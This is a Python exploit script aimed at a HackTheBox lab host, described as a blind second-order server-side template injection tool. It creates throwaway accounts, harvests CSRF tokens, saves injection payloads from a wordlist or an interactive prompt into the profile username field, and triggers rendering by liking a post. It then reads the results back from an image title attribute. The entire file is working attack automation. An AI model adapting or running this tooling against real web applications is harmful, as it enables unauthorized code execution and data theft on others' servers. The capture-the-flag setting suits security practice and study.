|
from prompt_toolkit import prompt |
|
from prompt_toolkit.styles import Style |
|
from prompt_toolkit.formatted_text import FormattedText |
|
from prompt_toolkit.shortcuts import print_formatted_text |
|
from prompt_toolkit.history import FileHistory |
|
from prompt_toolkit.key_binding import KeyBindings |
|
from bs4 import BeautifulSoup |
|
from pwn import log |
|
from pathlib import Path |
|
import requests |
|
import string |
|
import random |
|
import argparse |
|
|
|
BASE = "http://hacknet.htb" |
|
DEFAULT_HEADERS = { |
|
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36", |
|
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", |
|
"Connection": "keep-alive", |
|
} |
|
data_saved = { |
|
"sessionid": None, |
|
"csrftoken": "", |
|
"csrfmiddlewaretoken": "", |
|
} |
|
PROMPT_STYLE = Style.from_dict( |
|
{ |
|
"prompt": "#f8a bold", |
|
"info": "#ansicyan", |
|
"error": "#ansired", |
|
"prompt_post_id": "#ansiblue", |
|
"prompt_id_change_prompt": "#ff6", |
|
} |
|
) |
|
MAIN_PROMPT_TEXT = FormattedText([("class:prompt", "interactive> ")]) |
|
POST_ID_PROMPT_TEXT = FormattedText([("class:prompt_post_id", "post_id> ")]) |
|
|
|
|
|
def random_string(): |
|
length = random.randint(5, 25) |
|
chars = string.ascii_letters + string.digits |
|
prefix = "".join(random.choice(chars) for _ in range(length)) |
|
email = f"{prefix}@a.com" |
|
return email, prefix |
|
|
|
|
|
def get_csrf_token(session: requests.Session, url: str): |
|
session.headers.update(DEFAULT_HEADERS) |
|
r = session.get(f"{BASE}{url}", timeout=50) |
|
r.raise_for_status() |
|
csrftoken_cookie = ( |
|
session.cookies.get("csrftoken") or r.cookies.get("csrftoken") or "" |
|
) |
|
soup = BeautifulSoup(r.text, "html.parser") |
|
token_tag = soup.find("input", attrs={"name": "csrfmiddlewaretoken"}) |
|
if not token_tag or not token_tag.get("value"): |
|
log.warning("CSRF token not found on GET %s", url) |
|
raise RuntimeError("CSRF token not found") |
|
token_value = token_tag.get("value") |
|
data_saved["csrftoken"] = csrftoken_cookie |
|
data_saved["csrfmiddlewaretoken"] = token_value |
|
return data_saved |
|
|
|
|
|
def register(s: requests.Session, email: str, username: str): |
|
REGISTER = "/register" |
|
get_csrf_token(s, REGISTER) |
|
payload = { |
|
"csrfmiddlewaretoken": data_saved["csrfmiddlewaretoken"], |
|
"email": email, |
|
"username": username, |
|
"password": "a", |
|
} |
|
r = s.post(BASE + REGISTER, data=payload, timeout=50) |
|
err_msg = BeautifulSoup(r.text, "html.parser").find(id="err_message") |
|
if not err_msg: |
|
return {"ok": False, "message": "unknown"} |
|
if "created" in err_msg.get_text(strip=True): |
|
data_saved["csrftoken"] = data_saved["csrftoken"] |
|
return { |
|
"ok": True, |
|
"message": "user created", |
|
} |
|
else: |
|
return {"ok": False, "message": "user already in use"} |
|
|
|
|
|
def login(s: requests.Session, email): |
|
try: |
|
LOGIN = "/login" |
|
get_csrf_token(s, LOGIN) |
|
payload = { |
|
"csrfmiddlewaretoken": data_saved["csrfmiddlewaretoken"], |
|
"email": email, |
|
"password": "a", |
|
} |
|
r = s.post(BASE + LOGIN, data=payload, timeout=50, allow_redirects=False) |
|
if r.status_code == 302 and r.headers.get("Location") == "/profile": |
|
data_saved["sessionid"] = r.cookies.get("sessionid") |
|
return data_saved["sessionid"] |
|
except requests.RequestException as e: |
|
log.warning(e) |
|
|
|
|
|
def save_payload(s: requests.Session, payload, username): |
|
try: |
|
PROFILE_EDIT = "/profile/edit" |
|
get_csrf_token(s, PROFILE_EDIT) |
|
data = { |
|
"csrfmiddlewaretoken": data_saved["csrfmiddlewaretoken"], |
|
"email": "", |
|
"username": payload, |
|
"password": "", |
|
"about": "", |
|
"is_public": "on", |
|
} |
|
files = {"pictures": ("", b"")} |
|
headers = {"Referer": f"{BASE}{PROFILE_EDIT}", "Origin": BASE} |
|
r = s.post( |
|
BASE + PROFILE_EDIT, |
|
data=data, |
|
files=files, |
|
headers=headers, |
|
allow_redirects=True, |
|
) |
|
if r.status_code == 403: |
|
exit(1) |
|
elif "Profile updated" in r.text: |
|
pass |
|
elif payload == username: |
|
log.warning(f"{username} (username) & {payload} (payload) are same!") |
|
pass |
|
elif "User exists" in r.text: |
|
log.warning(f"User exists: {payload}") |
|
email, prefix = random_string() |
|
save_payload(s, prefix, username) |
|
exit(1) |
|
elif r.status_code == 500: |
|
log.success(f"vulnerable? {payload}") |
|
except requests.exceptions.RequestException as e: |
|
log.warning(e) |
|
|
|
|
|
def trigger(s: requests.Session, payload, post_id: str | None = None): |
|
liked = False |
|
LIKE = BASE + "/like/" + f"{post_id}" |
|
LIKES = BASE + "/likes/" + f"{post_id}" |
|
r = s.get(LIKES, timeout=50) |
|
soup = BeautifulSoup(r.text, "html.parser") |
|
image_default = soup.find("img", {"src": "/media/profile.png"}) |
|
if image_default is None: |
|
r = s.get(LIKE, timeout=50) |
|
if "Success" in r.text: |
|
liked = True |
|
if liked is True: |
|
r = s.get(LIKES, timeout=50) |
|
if "Something went wrong" in r.text: |
|
pass |
|
else: |
|
soup = BeautifulSoup(r.text, "html.parser").find( |
|
"img", {"src": "/media/profile.png"} |
|
) |
|
if not soup: |
|
pass |
|
elif soup and soup.get("title") == "": |
|
pass |
|
else: |
|
log.info(f"triggering payload: '{payload}'") |
|
log.success(f"output: {soup.get('title')}") |
|
r = s.get(LIKE, timeout=50) |
|
if "Success" in r.text: |
|
liked = False |
|
else: |
|
s.get(LIKE, timeout=50) |
|
trigger(s, payload, post_id) |
|
|
|
|
|
def manual_injecting(s: requests.Session, payload, post_id: str | None = None): |
|
FILE_NAME = Path("/tmp/cookie.txt") |
|
prefix = "" |
|
s.cookies.clear() |
|
if FILE_NAME.is_file(): |
|
with open(FILE_NAME, "r") as f: |
|
s.cookies.set("sessionid", f.read().strip()) |
|
email, prefix = random_string() |
|
save_payload(s, payload, prefix) |
|
trigger(s, payload, post_id) |
|
save_payload(s, prefix, prefix) |
|
else: |
|
email, prefix = random_string() |
|
reg = register(s, email, prefix) |
|
if reg["ok"]: |
|
login_cookie = login(s, email) |
|
if login_cookie is None: |
|
manual_injecting(s, payload) |
|
elif login_cookie: |
|
FILE_NAME.write_text(login_cookie) |
|
data_saved["sessionid"] = login_cookie |
|
manual_injecting(s, payload) |
|
|
|
|
|
def interactive_shell(s: requests.Session, post_id): |
|
history = FileHistory(".manual_history") |
|
kb = KeyBindings() |
|
current_post_id = post_id |
|
|
|
@kb.add("escape", "p") |
|
def _(event): |
|
nonlocal current_post_id |
|
event.app.exit(result="__change_post_id__") |
|
|
|
while True: |
|
try: |
|
user_input = prompt( |
|
MAIN_PROMPT_TEXT, style=PROMPT_STYLE, history=history, key_bindings=kb |
|
) |
|
if user_input == "__change_post_id__": |
|
try: |
|
new_post_id = prompt(POST_ID_PROMPT_TEXT, style=PROMPT_STYLE) |
|
current_post_id = int(new_post_id) |
|
except ValueError: |
|
log.warning("invalid post_id. number only.") |
|
continue |
|
payload = user_input.strip() |
|
if payload.lower() in ["exit", "quit"]: |
|
exit_message = FormattedText([("class:info", "Goodbye.")]) |
|
print_formatted_text(exit_message, style=PROMPT_STYLE) |
|
break |
|
if not payload: |
|
continue |
|
manual_injecting(s, payload, current_post_id) |
|
except KeyboardInterrupt: |
|
error_message = FormattedText([("class:error", "Use 'exit' to quit.")]) |
|
print_formatted_text(error_message, style=PROMPT_STYLE) |
|
break |
|
except EOFError: |
|
exit_message = FormattedText([("class:info", "Goodbye.")]) |
|
print_formatted_text(exit_message, style=PROMPT_STYLE) |
|
break |
|
|
|
|
|
def main(): |
|
parser = argparse.ArgumentParser(description="Blind Second-Order SSTI.") |
|
parser.set_defaults(func=lambda args: parser.print_help()) |
|
subparsers = parser.add_subparsers(dest="command") |
|
|
|
parser_file = subparsers.add_parser("file") |
|
parser_file.add_argument( |
|
"filename", nargs="?", help="define SSTI payload wordlist." |
|
) |
|
parser_file.add_argument("-n", "--post-id", type=int, default=10) |
|
|
|
def handle_file(args): |
|
try: |
|
session = requests.Session() |
|
with open(args.filename) as f: |
|
email, prefix = random_string() |
|
payloads = [line.strip() for line in f if line.strip()] |
|
reg = register(session, f"{email}", f"{prefix}") |
|
login_cookie = login(session, email) |
|
log.info(f"profile cookie: {login_cookie}") |
|
log.info(f"email: {email}") |
|
post_id = str(args.post_id) if args.post_id > 0 else "10" |
|
for payload in payloads: |
|
if reg["ok"]: |
|
save_payload(session, payload, prefix) |
|
trigger(session, payload, post_id) |
|
save_payload(session, prefix, prefix) |
|
except FileNotFoundError as e: |
|
log.warning(f"{e}") |
|
|
|
parser_file.set_defaults(func=lambda args: handle_file(args)) |
|
|
|
parser_manual = subparsers.add_parser( |
|
"manual", help="run a single manual payload test." |
|
) |
|
parser_manual.add_argument( |
|
"-n", |
|
"--post-id", |
|
type=str, |
|
default=None, |
|
help="The post ID to trigger the payload on.", |
|
) |
|
|
|
def handle_manual(args): |
|
session = requests.Session() |
|
interactive_shell(session, args.post_id) |
|
|
|
parser_manual.set_defaults(func=lambda args: handle_manual(args)) |
|
|
|
args = parser.parse_args() |
|
args.func(args) |
|
|
|
|
|
if __name__ == "__main__": |
|
main() |